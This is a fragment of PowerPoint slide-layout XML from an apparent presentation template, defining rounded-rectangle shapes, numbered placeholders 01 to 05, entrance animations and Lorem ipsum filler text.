          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3882071" y="1568515"/>
            <a:ext cx="3953299" cy="4873008"/>
            <a:chOff x="-1393297" y="-1336778"/>
            <a:chExt cx="6142038" cy="8412162"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 1"/>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-1393297" y="-1336778"/>
              <a:ext cx="6142038" cy="8412162"/>
              <a:chOff x="-1393297" y="-1336778"/>
              <a:chExt cx="6142038" cy="8412162"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="43" name="AutoShape 1"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-1385359" y="3649559"/>
                <a:ext cx="6134100" cy="342582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" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="88"/>
                      <a:pt x="0" y="132"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="2252"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="12937"/>
                      <a:pt x="4834" y="21599"/>
                      <a:pt x="10799" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16763" y="21599"/>
                      <a:pt x="21599" y="12937"/>
                      <a:pt x="21599" y="2252"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21599" y="132"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21599" y="88"/>
                      <a:pt x="21598" y="44"/>
                      <a:pt x="21598" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="18198" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18198" y="2520"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="18198" y="9811"/>
                      <a:pt x="14900" y="15722"/>
                      <a:pt x="10830" y="15722"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6759" y="15722"/>
                      <a:pt x="3460" y="9811"/>
                      <a:pt x="3460" y="2520"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3460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</p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="AutoShape 17"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2408766" y="-789091"/>
                <a:ext cx="993775" cy="5443538"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 49824"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="AutoShape 20"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-161397" y="-654153"/>
                <a:ext cx="993775" cy="5308600"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 49824"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="AutoShape 24"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1070503" y="-1336778"/>
                <a:ext cx="993775" cy="6003925"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 49824"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="AutoShape 27"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-1393297" y="2030309"/>
                <a:ext cx="993775" cy="2624138"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 49824"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52" name="AutoShape 30"/>
              <p:cNvSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3772428" y="561872"/>
                <a:ext cx="968375" cy="4060825"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 48509"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="48514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s-ES" sz="672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Gill Sans" charset="0"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Gill Sans" charset="0"/>
                  <a:sym typeface="Gill Sans" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="AutoShape 18"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2415116" y="1404214"/>
              <a:ext cx="969962" cy="968375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 49819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>
              <a:outerShdw blurRad="127000" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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s-ES" sz="672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ea typeface="+mn-ea"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="AutoShape 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-159809" y="1404214"/>
              <a:ext cx="968375" cy="968375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 49819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>
              <a:outerShdw blurRad="127000" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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s-ES" sz="672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ea typeface="+mn-ea"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="AutoShape 25"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1072091" y="388214"/>
              <a:ext cx="968375" cy="968375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 49819"/>
              </a:avLst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>
              <a:outerShdw blurRad="127000" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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s-ES" sz="672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ea typeface="+mn-ea"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="AutoShape 28"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1379009" y="2420214"/>
              <a:ext cx="968375" cy="968375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 49819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>
              <a:outerShdw blurRad="127000" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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s-ES" sz="672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ea typeface="+mn-ea"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="AutoShape 31"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3772428" y="2401784"/>
              <a:ext cx="968375" cy="968375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 49819"/>
              </a:avLst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  <a:effectLst>
              <a:outerShdw blurRad="127000" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="000000">
                  <a:alpha val="50000"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l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s-ES" sz="672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ea typeface="+mn-ea"/>
                <a:cs typeface="Gill Sans" charset="0"/>
                <a:sym typeface="Gill Sans" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="81" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3917827" y="3734194"/>
            <a:ext cx="556876" cy="56159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  <a:latin typeface="Lato Black"/>
                <a:cs typeface="Lato Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="47" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697095" y="3159647"/>
            <a:ext cx="556876" cy="56159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  <a:latin typeface="Lato Black"/>
                <a:cs typeface="Lato Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="48" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5500482" y="2567771"/>
            <a:ext cx="556876" cy="56159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  <a:latin typeface="Lato Black"/>
                <a:cs typeface="Lato Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="49" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361221" y="3137655"/>
            <a:ext cx="556876" cy="56159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  <a:latin typeface="Lato Black"/>
                <a:cs typeface="Lato Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="50" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245102" y="3733557"/>
            <a:ext cx="556876" cy="56159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  <a:latin typeface="Lato Black"/>
                <a:cs typeface="Lato Black"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="82" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="1527880"/>
            <a:ext cx="406393" cy="3453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160" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="4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smtClean="0"/>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="83" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215265" y="1527880"/>
            <a:ext cx="406393" cy="3453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160" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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smtClean="0"/>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="84" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="3144408"/>
            <a:ext cx="406393" cy="3453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160" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent3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smtClean="0"/>
              <a:t>03</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="85" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215265" y="3144408"/>
            <a:ext cx="406393" cy="3453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160" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent4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smtClean="0"/>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="86" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603254" y="4746930"/>
            <a:ext cx="406393" cy="3453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160" b="1" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent5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smtClean="0"/>
              <a:t>05</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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40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4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4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400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4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4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4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4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4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4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4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4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400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1" dur="4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4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400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6" dur="4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4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4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1" dur="4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4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400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6" dur="4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4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400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1" dur="400" fill="hold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400" fill="hold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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="134" presetID="53" presetClass="entr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6" dur="5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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="140" presetID="53" presetClass="entr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5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1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="146" presetID="53" presetClass="entr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8" dur="5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5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2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="152" presetID="53" presetClass="entr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4" dur="5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5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" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="158" presetID="53" presetClass="entr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0" dur="5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5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6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5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9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22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25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2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4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54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5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5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4" grpId="1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55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5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5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5" grpId="1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56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5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5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1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7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57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5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5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7" grpId="1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5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5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5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8" grpId="1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59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5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5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60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6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6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61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6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6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2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62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6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6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3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63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6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6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with content Clea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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591965" y="5655212"/>
            <a:ext cx="10973505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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Maecenas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lacus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mauris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>feugiat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tristique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> et in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metus.is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>congue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lectus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper semper. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nullam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>finibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nisl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ligula </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vestibulum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> semper ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>suscipit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
